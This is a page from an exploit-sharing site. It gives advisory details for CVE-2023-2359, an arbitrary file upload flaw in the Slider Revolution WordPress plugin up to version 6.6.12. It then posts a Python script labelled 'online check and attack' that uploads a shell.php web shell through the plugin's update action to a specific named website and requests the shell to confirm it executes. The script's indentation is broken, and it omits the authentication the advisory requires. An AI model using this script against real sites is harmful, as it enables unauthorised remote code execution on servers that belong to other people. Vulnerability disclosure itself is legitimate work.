Slider Revolution <= 6.6.12 - Authenticated (Administrator+) Arbitrary File Upload

7.2
Unrestricted Upload of File with Dangerous Type
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVECVE-2023-2359
CVSS7.2 (High)
Publicly PublishedMay 22, 2023
Last UpdatedMay 30, 2023
ResearcherMarco Frison
Description

The Slider Revolution plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in versions up to, and including, 6.6.12. This makes it possible for authenticated attackers with administrator-level attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. While the default settings allow only administrators to exploit this vulnerability, this privilege can be granted to users as low as author.







EXPLOIT :


###################################

#online check and attack
#  Revolution Slider <= 6.6.12 - Author+ Remote Code Execution

###################################

import unittest
import requests

class TestSliderRevolution(unittest.TestCase):

def test_upload_file(self):

url = "http://adroom.ir/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin"
file = open("shell.php", "rb")
data = {"update_file": file}
response = requests.post(url, files=data)
self.assertEqual(response.status_code, 200)
self.assertIn("Update in progress", response.text) 

def test_execute_code(self):

url = "http://adroom.ir/wp-content/plugins/revslider/temp/update_extract/revslider/shell.php"
response = requests.get(url)
self.assertEqual(response.status_code, 200) 
self.assertIn("Hello, world!", response.text) 

if __name__ == "__main__":
unittest.main()

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.